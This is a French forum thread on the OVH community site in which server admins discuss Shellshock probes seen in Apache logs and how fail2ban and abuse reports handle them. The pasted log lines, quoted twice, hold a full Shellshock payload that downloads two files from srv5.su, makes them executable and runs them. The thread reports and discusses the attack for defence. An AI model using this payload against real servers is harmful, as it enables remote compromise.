OVH Community, votre nouvel espace communautaire.

Attaque depuis machine chez OVH


abyss68
12/04/2015, 16h02
Citation Envoyé par janus57
Bonjour,

et pour info en activant les mails fail2ban avec un "bantime" un peu trop léger c'est le spam garantie, perso j'ai désactivé les mails et j'oublie les abuse que que 50% des hébergeurs l'ignore ou donne une réponse 1mois plus tard.

Cordialement, janus57
Bha celui la avec 15 requêtes en même temps il est ban immédiatement !!
(11/Apr/2015:21:43:26)

Nowwhat
12/04/2015, 14h35
Citation Envoyé par abyss68
Hello, juste pour le signaler, sur mon dédié fail2ban ma reporté des 404 provenant de plusieurs machine OVH



et un bout de log Apache

Code:
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 487 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 482 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET / HTTP/1.0" 200 11783 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /admin.cgi HTTP/1.0" 404 471 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/bash HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 475 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/helpme HTTP/1.0" 404 476 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/info.sh HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/php5-cli? HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/php5? HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/guestbook.cgi HTTP/1.0" 404 483 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/php5? HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /phppath/cgi_wrapper? HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /phppath/php? HTTP/1.0" 404 473 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 475 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/contact.cgi HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/defaultwebpage.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/env.cgi HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/forum.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/hello.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/index.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/login.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
100 % shellshock .... un des gros affaires de 2014.
100% du boulot pour fail2ban. Lui qui utilise encore ça - probablement un serveur hacké avec un apprentie 'hackeur' au commandes - c'est même pas la peine ...

janus57
12/04/2015, 14h15
Citation Envoyé par Daniel60
Le service abuse d'OVH ne donne jamais de réponse, mais il agit (parfois)
Bonjour,

ah c'était pas spécialement pour OVH, mais les hébergeur en générale (FR/DE/US etc...)

Je sais que OVH ne répond jamais aux abuse comparé à Online qui lui répond (ou directement le client sa dépend).

Par contre perso je surveille plus les IPs bannis, là j'en ai 250 sur 2VPS différents qui sont bann pour 1 à 2 mois.

Cordialement, janus57

Daniel60
12/04/2015, 14h10
Le service abuse d'OVH ne donne jamais de réponse, mais il agit (parfois)

janus57
12/04/2015, 11h45
Bonjour,

et pour info en activant les mails fail2ban avec un "bantime" un peu trop léger c'est le spam garantie, perso j'ai désactivé les mails et j'oublie les abuse que que 50% des hébergeurs l'ignore ou donne une réponse 1mois plus tard.

Cordialement, janus57

Daniel60
12/04/2015, 08h45
--> abuse.ovh.net

abyss68
12/04/2015, 07h34
Hello, juste pour le signaler, sur mon dédié fail2ban ma reporté des 404 provenant de plusieurs machine OVH



et un bout de log Apache

Code:
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 487 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 482 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET / HTTP/1.0" 200 11783 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /admin.cgi HTTP/1.0" 404 471 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/bash HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 475 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
